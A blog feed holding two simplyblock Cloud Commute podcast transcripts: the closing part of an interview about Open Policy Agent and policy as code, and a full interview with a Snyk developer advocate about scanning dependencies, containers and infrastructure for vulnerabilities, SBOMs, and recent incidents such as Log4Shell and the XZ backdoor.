Anders Eknert: Yeah, yeah. Now, and another difference I think like today compared to 20 years ago is like, at least when I started working in tech, it was like, if you got to any larger company, they’re like, ‘Hey, we’re doing Java here or we’re doing like .NET.’ But if you go to those companies today, they’re like, ‘There’s going to be Python. There’s going to be Erlang. There’s going to be some closure running somewhere. There’s going to be like so many different things.’

This idea of team autonomy and like teams and deciding for themselves what the best solution for any given problem is. And that is, I love that. It’s like, it makes it so much more interesting to work in tech, but it also provides like a huge challenge for anything that is security related because in anything anywhere where you need to kind of centralize or have some form of control, it’s really, really hard. How do you audit something if it’s like in eight different programming languages? Like I can barely understand two of them. Like how would I do that?

Chris Engelbert: How to make sure that all the policies are implemented? If policy change happens, yeah, you’re right. You have to implement it in multiple languages. The descriptor language for the rules isn’t the same. Yeah, that’s a good point. That’s a very good point actually. And just because time, I think I would have like a million more questions, but there’s one thing that I always have to ask. What do you think is like the next big thing in terms of cloud, in your case, authorization policies, but also in the broader scheme of everything?

Anders Eknert: Yeah, sure. So I’d say like, first of all, I think both identity and access control, they are kind of slow moving and for good reasons. There’s not like there’s going to be a revolutionary thing or disruptive event that turns everything around. I think that’s basically where we have to be. We can rely on things to not change or to update too frequently or too dramatically.

So yeah, what would the next big thing is, I still think like this area where we decoupled policy and we worked with it consistently across like large organizations and so on, it’s still the next revolutionary thing. It’s like, there’s definitely a lot of adopters already, but we’re just at a start of this. And again, that’s probably like organizations don’t just swap out their like how they do authorization or identity that could be like a decade or so. So I still think this policy as code while it’s starting to be like an established concept, that it is still the next big thing. And that’s why it’s also so exciting to work with in this space.

Chris Engelbert: All right, fair enough. At least you didn’t say automatic AI generation.

Anders Eknert: No, God no.

Chris Engelbert: That would have been really the next big thing. Now we’re talking. No, seriously. Thank you very much. That was very informative. I loved that. Yeah, thank you for being here.

Anders Eknert: Thanks for having me.

Chris Engelbert: And for the audience, next week, same time, same podcast channel, whatever you want to call that. Hope to hear you again or you hear me again. And thank you very much.

Key Takeaways

In this episode of simplyblock’s Cloud Commute Podcast, host Chris Engelbert welcomes Anders Eknert, a developer advocate and DevRel lead at Styra, the company behind the Open Policy Agent (OPA) project. The conversation dives into Anders’ background, Styra’s mission, and the significance of OPA in managing policies at scale.

Anders Eknert works as a Developer Advocate/DevRel at Styra, the company responsible for the Open Policy Agent (OPA) Project. He’s been with the company for 3.5 years and was previously involved in the OPA project at another company.

Styra created and maintains the OPA project with 2 key products around OPA; 1) Styra DAS, a commercial control plane for managing OPA at scale, handling the entire policy lifecycle and 2) an enterprise distribution of OPA, which has a different runtime and allows it to consume less memory, evaluate faster, connect to various data sources etc. If OPA is the distributed component, Styra DAS is a centralized component.

OPA is a framework to build and run policies – a project for defining policies as code, decoupled from applications, for use cases like authorization, or policy for infrastructure. The idea behind OPA is that it allows a unified way of working with policy across your whole stack and organization.

In the context of Kubernetes, there are 2 key use cases: 1) authorization inside of the workloads where OPA can be deployed as a sidecar or in a gateway or as part of an envoy proxy; 2) admission control where Kubernetes API is protected by OPA.

Anders also talks about the advent of the cloud and how policy management and automation has become essential due to the scale at which engineers today operate. He also discusses the use of diverse programming environments today and team autonomy, both of which necessitate a unified approach to policy management, making tools like OPA crucial.

Anders predicts that policy as code will continue to gain traction, offering a consistent and automated way to manage policies across organizations.

The post Policy Management at Cloud-Scale with Anders Eknert from Styra (video + interview) appeared first on simplyblock.

Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk

Chris Engelbert — Fri, 10 May 2024 12:12:16 +0000

This interview is part of the simplyblock’s Cloud Commute Podcast, available on Youtube , Spotify , iTunes/Apple Podcasts , Pandora , Samsung Podcasts, and our show site .

In this installment of podcast, we’re joined by Brian Vermeer ( Twitter/X , Personal Blog ) from Synk , a cybersecurity company providing tooling to detect common code issues and vulnerabilities throughout your development and deployment pipeline, talks about the necessity of multi checks, the commonly found threads, and how important it is to rebuild images for every deployment, even if the code hasn’t changed.

Chris Engelbert: Welcome back everyone. Welcome back to the next episode of simplyblock’s Cloud Commute podcast. Today I have yet another amazing guest with me, Brian from Snyk.

Brian Vermeer: That’s always the question, right? How do you pronounce that name? Is it Snek, Snik, Synk? It’s not Synk. It’s actually it’s Snyk. Some people say Snyk, but I don’t like that. And the founder wants that it’s Snyk. And it’s actually an abbreviation.

Chris Engelbert: All right, well, we’ll get into that in a second.

Brian Vermeer: So now you know, I mean.

Chris Engelbert: Yeah, we’ll get back to that in a second. All right. So you’re working for Snyk. But maybe we can talk a little bit about you first, like who you are, where you come from. I mean, we know each other for a couple of years, but…

Brian Vermeer: That’s always hard to talk about yourself, right? I’m Brian Vermeer. I live in the Netherlands, just an hour and a half south of Amsterdam. I work for Snyk as a developer advocate. I’ve been a long term Java developer, mostly back end developer for all sorts of jobs within the Netherlands. Java champion, very active in the community, specifically the Dutch community. So the Netherlands Java user group and adjacent Java user groups do some stuff in the virtual Java user group that we just relaunched. That I’ve tried to be active and I’m just a happy programmer.

Chris Engelbert: You’re just a happy programmer. Does that even exist?

Brian Vermeer: Apparently, I am the living example.

Chris Engelbert: All right, fair enough. So let’s get back to Snyk and the cool abbreviation. What is Snyk? What does it mean? What do you guys do?

Brian Vermeer: Well, what we do, first of all, we create security tooling for developers. So our mission is to make security an integrated thing within your development lifecycle. Like in most companies, it’s an afterthought. Like one security team trying to do a lot of things and we have something in the pipeline and that’s horrible because I don’t want to deal with that. If all tests are green, it’s fine. But what if we perceive it in such a way as, “Hey, catch it early from your local machine.” Just like you do with unit tests. Maybe that’s already a hard job creating unit tests, but hey, let’s say we’re all good at that. Why not perceive it in that way? If we can catch things early, we probably do not have to do a lot of rework if something comes up. So that’s why we create tooling for all stages of your software development lifecycle. And what I said, Snyk is an abbreviation. So now you know.

Chris Engelbert: So what does it mean? Or do you forget?

Brian Vermeer: So Now You Know.

Chris Engelbert: Oh!

Brian Vermeer: Literally. So now you know.

Chris Engelbert: Oh, that took a second.

Brian Vermeer: Yep. That takes a while for some people. Now, the thought behind that is we started as a software composite analysis tool and people just bring in libraries. They have no clue what they’re bringing in and what kind of implications come with that. So we can do tests on that. We can report of that. We can make reports of that. And you can make the decisions. So now at least you know what you’re getting into.

Chris Engelbert: Right. And I think with implications and stuff, you mean transitive dependencies. Yeah. Stuff like that.

Brian Vermeer: Yeah.

Chris Engelbert: Yeah. And I guess that just got worse with Docker and images and all that kind of stuff.

Brian Vermeer: I won’t say it gets worse. I think we shifted the problem. I mean, we used to do this on bare metal machines as well that these machines also had an operating system. Right. So I’m not saying it’s getting worse, but developers get into more responsibility because let’s say we’re doing DevOps, whatever that may mean. I mean, ask 10 DevOps engineers. That’s nowadays a job. What DevOps is, you probably get a lot of questions about tooling and that, but apparently what we did is tearing down the wall between old fashioned developer creation and getting things to production. So the ops folks, so we’re now responsible as a team to do all of that. And now your container or your environment, your cluster, your code is all together in your Git repository. So it’s all code now. And the team creating it is responsible for it. So yes, it shifted the problem from being in separate teams now to all in one team that we need to create and maintain stuff. So I don’t, I don’t think we’re getting into worse problems. I think we’re, we’re shifting the problems and it’s getting easier to get into problems. That’s, that’s what I, yeah.

Chris Engelbert: Yeah. Okay. We’re, we’re broadened the scope of where you could potentially run into issues. So, so the way it works is that Snyk, I need to remember to say Snyk and not Synk because now it makes sense.

Brian Vermeer: I’m okay with however you call it. As long as you don’t say sync, I’m fine. That’s, then you’re actually messing up letters.

Chris Engelbert: Yeah, sync, sync is different. It’s, it’s not, it’s not awkward and it’s not Worcester. Anyway. So, so that means the, the tooling is actually looking into, I think the dependencies, built environment, whatever ends up in your Docker container or your container image. Let’s say that way, nobody’s using Docker anymore. And all those other things. So basically everything along the pipeline or the built pipeline, right?

Brian Vermeer: Yeah. You can say that actually we start at the custom code that you’re actually writing. So we’re doing static analysis on that as well. Might combine that with stuff that we know from your, let’s say all your dependencies that come in your dependencies, transitive dependencies, like, “hey, you bring in a spring boot starter that has a ton of implications on how many libraries come in.” Are these affected? Yes or no, et cetera, et cetera. That we go one layer deeper or around that, say your, your container images and let’s say it’s Docker because it’s still the most commonly used, but whatever, like any image is built on a base image and probably you streamlined some binaries in there. So what’s there, that’s another shell around the whole application. And then you get into, in the end, for instance, your configuration for your infrastructure is go to the bullet. That can go wrong by not having a security context or like some policies that are not bad or something like that. Some pods that you gave more privileges than you should have because, Hey, it works on my machine, right? Let’s ship it. These kinds of things. So on all these four fronts, we try to provide pooling and test capabilities in such a way that you can choose how you want to utilize these test capabilities, either in a CI pipeline or our local machine or in between or part of your build, whatever fits your needs. And instead of, Hey, this needs to be part of your build pipeline, because that’s how the tool works. And I was a developer myself for back end for backend jobs a long time. And I was the person that was like, if we need to satisfy that tool, I will find a way around it.

Chris Engelbert: Yeah, I hear you.

Brian Vermeer: Which defeats the purpose because, because at that point you’re only like checking boxes. So I think if these tools fit your way of working and implement your way of working, then you actually have an enabler instead of a wall that you bump into every time.

Chris Engelbert: Yeah. That makes a lot of sense. So that means when you, say you start at a code level, I think simple, like the still most common thing, like SQL injection issues, all that kind of stuff, that is probably handled as well, right?

Brian Vermeer: Yeah. SQL injections, path of virtual injections, cross-site scripting, all these kinds of things will get notified and we will, if possible, we will give you remediation advice on that. And then we go levels deeper. So it’s actually like, you can almost say it’s like four different types of scanner that you can use in whatever way you want. Some people are like, no, I’m just only using the dependency analysis stuff. That’s also fine. Like it’s just four different capabilities for basically four levels in your, in your application, because it’s no longer just your binary that you put in. It’s more than that, as we just discussed.

Chris Engelbert: So, when we look at like the recent and not so recent past, I mean, we’re both coming from the Java world. You said you’re also, you were a Java programmer for a long time. I am. I think the, I mean, the Java world isn’t necessarily known for like the massive CVEs. except Log4Shell.

Brian Vermeer: Yeah, that was a big,

Chris Engelbert: Right? Yeah.

Brian Vermeer: The thing, I think, is in the Java world, it’s either not so big or very big. There’s no in between, or at least it doesn’t get the amount of attention, but yeah, Log4Shell was a big one because first of all, props to the folks that maintain that, because I think there were only three active maintainers at that point when the thing came out and it’s a small library that is used and consumed by a lot of bigger frameworks. So everybody was looking at you doing a bad job. It was just three guys that voluntarily maintained it.

Chris Engelbert: So for the people that do not know what Log4Shell was. So Log4J is one of the most common logging frameworks in Java. And there was a way to inject remote code and execute it with basically whatever permission your process had. And as you said, a lot of people love to run their containers with root privileges. So there is your problem right there. But yeah, so Log4Shell was, I think, at least from what I can remember, probably like the biggest CVE in the Java world, ever since I joined.

Brian Vermeer: Maybe that one, but we had in 2017, we had the Apache struts, one that blew, blew, blew away, blew away our friendly neighborhood Equifax. But yeah.

Chris Engelbert: I’m not talking about struts because that was like so long deprecated by that point of time. It was, it was, it was … They deserved it. No, but seriously, yeah. True, true. The struts one was also pretty big, but since we are just recording it, this on April 3rd, there was just like a very, very interesting thing that was like two days ago, three days ago, like April 1st. I think it was actually April 1st, because I initially thought it’s an April’s Fool joke, but it was unfortunately not.

Brian Vermeer: I think it was the last day of March though. So it was not.

Chris Engelbert: Maybe I just saw it like April 1st. To be honest, initially I thought, okay, that’s a really bad April’s Fool. So what we’re talking about is the XZ issue. Maybe you want to say a few words about that or what?

Brian Vermeer: Well, let’s keep it simple. The XZ issue is basically an issue in one of the tools that come with some Linux distributions. And long story short, I’m not sure if they already created exploits on that. I didn’t, I didn’t actually try it because we’ve got folks that are doing the research. But apparently there, because of that tool, you could do nasty stuff such as arbitrary code executions or, or things with going into secure connections. At least it comes with your operating system. So that means if you have a Docker image or whatever image and you’re based on a certain well-known Linux distribution, you might be infected, regardless of whatever your application does. And it’s a big one. If you want to go deeper, there are tons of blogs of people that can explain to you what the actual problem was. But I think for the general developers, like, don’t shut your eyes and like, it’s not on my machine. It might be in your container because you’re using an outdated, now outdated image.

Chris Engelbert: I think there’s two things. First of all, I think it was found before it actually made it into any distribution, which is good. So if you’re, if you’re not using any of the like self-built distributions, you’re probably good. But what I found more interesting about it, that this backdoor was introduced from a person that was working on the tool for quite a while, like over a year or so, basically getting the trust of the actual maintainers and just sneaking stuff in eventually. And that is… That is why I think tools like Snyk or let’s, let’s be blunt, some of the competitors are so important, right? Because it’s, it’s really hard to just follow all of the new CVEs and sometimes they’re not blowing up this big. So you probably don’t even hear about them, but for that reason, it’s really important to have those tools.

Brian Vermeer: I totally agree. I mean, as a development team, it is a side effect for you, like you’re building stuff and you don’t focus on checking manually, whatever is coming in and if it’s vulnerable or not, but you should be aware of these kinds of things. And so if they come in, you can make appropriate choices. I’m not saying you have to fix it. That’s up to you, like, and your threat level and whatever is going on in your company, but you need to be able to make these decisions based on accurate knowledge and have the appropriate knowledge that you can actually make such a decision. And yeah, you don’t want to manually hunt these things down. You want to be actively pinged when something happens to your application that might have implications for it, for your security risk.

Chris Engelbert: Right. And from your own feeling, like, in the past, we mostly deployed like on-prem installations or in like private clouds, but with the shift to public cloud, do we increase the risk factor? Do we increase the attack surface?

Brian Vermeer: Yes. I think the short story, the short thing is, yes, there are more things that we have under our control as a development team. We do not always have the necessary specialties within the team. So we’re doing the best we can, but that means we’ve got multiple attack phases. Like your connection with your application is one thing, but this one is if I can get into your container for some reason, I can use this, even though at some, some things in containers or some things in operating systems might not be directly usable, but part of a chain that causes a problem. So I can get in in one, like if there’s one hole, I could get in and use certain objects or certain binaries in my chain of attacks and make it a domino effect, basically. So you’re, you’re giving people more and more ammunition. So, and as we automate certain things, we do not always have the necessary knowledge about certain things that might become bigger and bigger. Plus the fast pace we’re currently moving. Like, like tell me like 10 years ago, how were you deploying?

Chris Engelbert: I don’t know. I don’t remember. I don’t remember yesterday.

Brian Vermeer: Yeah. But I mean, probably not three times a day, like 10 years ago, we’re probably deploying once a month, you have time to test or something like that. So it’s a combination of doing all within one team, which yes, we should do, but also the fast pace that we need to release nowadays is something like, okay, we’re just doing it. The whole continuous development and continuous deployment is part of this. If you’re actually doing that, of course.

Chris Engelbert: Yeah, that’s, that’s true. I think it would have been like about every two weeks or so. But yeah, you normally had like one week development, one week bug fixing and testing, and then you deployed it. Now it’s like, you do something, you think it’s ready, it runs through the pipeline. And in the best case, it gets deployed immediately. And if something breaks, you gonna fix it. Or are you in the worst case, you roll back if it’s really bad.

Brian Vermeer: But on the other end, say you’re an application developer, and you need to do that stuff in a container. And do you ship it? Are you touching your container if you or rebuild your container if your application didn’t change?

Chris Engelbert: Yes.

Brian Vermeer: Probably, probably, probably a lot of folks won’t, because hey, did some, some things didn’t change, but it can be that the image your base your stuff upon or your base image or however you may manage that can be company wide, or you just will something out of Docker hub or whatever. That’s another layer that might have changed and might have been fixed or might have been vulnerabilities found in it. So it’s not anymore like, ‘hey, I didn’t touch that application. So I don’t have to rebuild.’ Yes, you should because other layers in that whole application changed.

Chris Engelbert: Right, right. And I think you brought up an important other factor. It might be that meanwhile, like, during the last we were in between the last deployment, and now a CVE has been found or something else, right? So you want to make sure you’re going to test it again. And then you have other programming languages, I’m not naming things here. But you might get a different version of the dependency, which is slightly newer. You’re doing a new install, right? And, and all of that are there’s so many different things, applications, these days, even micro services are so complex, because they normally need like, so many different dependencies. And it is hard to keep an eye on that. And that kind of brings me to the next question, like, how does snake play into something like SBOM or the software bill of materials?

Brian Vermeer: Getting into the hype train of SBOMs. Now, it’s not, it’s not just the hype train. I mean, it’s a serious thing. For folks that don’t know, you can compare the SBOM as your ingredients nutrition list for whatever you try to consume to stuff in your face. Basically, what’s in there, you have no clue, the nutrition facts on the package should say what’s in it, right? So that’s how you should perceive an SBOM. If you create an artifact, then you should create a suitable SBOM with it that basically says, ‘okay, I’m using these dependencies and these transitive dependencies, and maybe even these Docker containers or whatever, I’m using these things to create my artifact.’ And a consumer of that artifact is then able to search around that like say a CVE comes up, a new Log4Shell comes up, let’s make it big. Am I infected? That’s the first question, a consumer or somebody that uses your artifact says. And with an SBOM, you have a standardized, well, there are three standards, but nevertheless, like multiple standard, but there’s a standardized way of having that and make it at least machine searchable to see if you are vulnerable or not. So how do we play into that? Yes, you can use our sneak tooling to create SBOMs for your applications or for your containers, that’s possible. We have the capabilities to read SBOMs in to see if these SBOMs contain packages or artifacts or stuff that have known vulnerabilities. So you can again, take the appropriate measures. I think it’s, yes, SBOM is great from the consumer side. So it’s very clear what that stuff that I got from the internet or got from a supplier, because we’re talking about supply chain all the time, from a supplier within stuff that I build upon or that I’m using that I can see if it contains problems or it contains potential problems when something new comes up. And yes, we have capabilities of creating these SBOMs and scanning these SBOMs.

Chris Engelbert: All right. We’re basically out of time. But there’s one more question I still want to ask. And how do you or where do you personally see the biggest trend could be related to Snyk to security in general?

Brian Vermeer: The biggest trend is the hype of AI nowadays. And that is definitely a thing. What people think is that AI is a suitable replacement for a security engineer. Yeah, I exaggerate now, but that’s not because we have demos where we let a code assistant tool, a well known code assistant tool, spit out vulnerable code, for instance. So I think the trend is two things, the whole supply chain, software supply chain, whatever you get into, you should look at one thing. But the other tool is that if people are using AI, don’t trust it blindly. And I think it’s that’s for everything for both stuff in your supply chain, as in generated code by a code assistant. You should know what you’re doing. Like it’s a great tool. But don’t trust it blindly, because it can also hallucinate and bring in stuff that you didn’t expect if you are not aware of what you’re doing.

Chris Engelbert: So yeah. I think that is a perfect closing. It can hallucinate things.

Brian Vermeer: Oh, definitely, definitely. It’s a lot of fun to play with it. It’s also a great tool. But you should know it doesn’t first of all, it doesn’t replace developers that think. Like thinking is still something an AI doesn’t do.

Chris Engelbert: All right. Thank you very much. Time is over. 20 minutes is always super, super short, but it’s supposed to be that way. So Brian, thank you very much for being here. I hope that was not only interesting to me. I actually learned quite a few new things about Snyk because I haven’t looked into it for a couple of years now. So yeah, thank you very much. And for the audience, I hope you’re listening next week. New guest, new show episode, and we’re going to see you again.

The post Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk appeared first on simplyblock.